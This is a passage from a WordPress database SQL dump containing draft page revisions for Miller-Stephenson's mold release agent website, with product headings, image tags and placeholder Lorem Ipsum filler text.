Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Large Inventory</h3>\n<p>Our four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/featured_box]\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\n\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys™ </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" color="white" style="outline" radius="82" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-30 18:17:33', '2017-05-30 18:17:33', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4344, 2, '2017-05-30 18:37:39', '2017-05-30 18:37:39', '<h3 style="text-align: left;"><strong>Summary of Release Agents by Application HERE</strong></h3>\r\nA wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me: when I hear the buzz of the little world among the stalks, and grow familiar with the countless indescribable forms of the insects and flies, then I feel the presence of the Almighty, who formed us in his own image, and the breath\r\n\r\n<strong>Advanced Composites Mold Release</strong>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="168" height="168" />\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 18:37:39', '2017-05-30 18:37:39', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4345, 2, '2017-05-30 18:39:14', '2017-05-30 18:39:14', '<h3 style="text-align: left;"><strong>Summary of Release Agents by Application HERE</strong></h3>\r\nA wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me: when I hear the buzz of the little world among the stalks, and grow familiar with the countless indescribable forms of the insects and flies, then I feel the presence of the Almighty, who formed us in his own image, and the breath\r\n\r\n<strong>Advanced Composites Mold Release</strong>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="168" height="168" />\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 18:39:14', '2017-05-30 18:39:14', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4346, 2, '2017-05-30 18:43:39', '2017-05-30 18:43:39', '<h3 style="text-align: left;"><strong>Summary of Release Agents by Application HERE</strong></h3>\r\nA wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me: when I hear the buzz of the little world among the stalks, and grow familiar with the countless indescribable forms of the insects and flies, then I feel the presence of the Almighty, who formed us in his own image, and the breath\r\n\r\n<strong>Advanced Composites Mold Release</strong>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="168" height="168" />\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 